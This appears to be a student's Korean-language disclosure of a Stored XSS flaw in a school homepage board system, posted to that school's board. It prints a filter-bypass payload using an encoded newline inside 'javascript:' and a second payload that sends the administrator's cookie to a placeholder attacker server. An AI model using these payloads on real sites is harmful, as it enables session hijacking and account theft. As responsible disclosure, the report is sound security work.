안녕하세요.

저는 현재 정보보호영재교육원에서 보안에 대해 공부하고 있는 양청고등학교 3학년 이세형이라고 합니다.

(저의 아이디로는 글쓰기가 불가하여 학교 홈페이지 관리 담당 선생님께 부탁 드려 글을 남깁니다.)

다름이 아니라 학교 홈페이지 게시판에서 Stored XSS 취약점 공격 가능성을 발견하였습니다.

거의 대부분의 학교가 교육정보원에서 제공하는 홈페이지 통합 관리 시스템을 사용하므로 같은 취약점이 있으리라 생각됩니다.

취약점 증명 코드는 아래와 같습니다.

[*]PoC : <a href="javas&#xA;cript:alert(1);">XSS PoC</a>

줄바꿈 문자를 html HEX Encoding 하여 중간에 삽입함으로써 javascript 필터링을 우회하였습니다.

위의 필터링을 응용하여 아래와 같은 스크립트를 작성해 관리자의 쿠키 정보를 가로채서 관리자의 계정을 탈취할 수도 있습니다.

[*]PoC : <a href="javas&#xA;cript:document.location='[공격자의 서버 주소]/?cookie='+document.cookie">Click Me</a>

(코드 설명 : GET 방식으로 쿠키 정보를 공격자의 서버로 전송한다.)

XSS 취약점을 작은 취약점이라고 생각하며 대수롭지 않게 생각하실 수도 있는데 ActiveX의 취약한 함수를 통해 RCE(원격명령실행) 공격을 수행할 수 있고 악성 자바 스크립트를 실행시켜 생각보다 위험한 결과를 이끌 수도 있다는게 저의 의견입니다.

요즘 기온이 올라가는 날들이 계속되고 있는데 건강 조심하시고 

저의 제보가 안전한 서비스 제공에 도움이 되었으면 좋겠습니다.

감사합니다.

Email : hackintoanetwork@gmail.com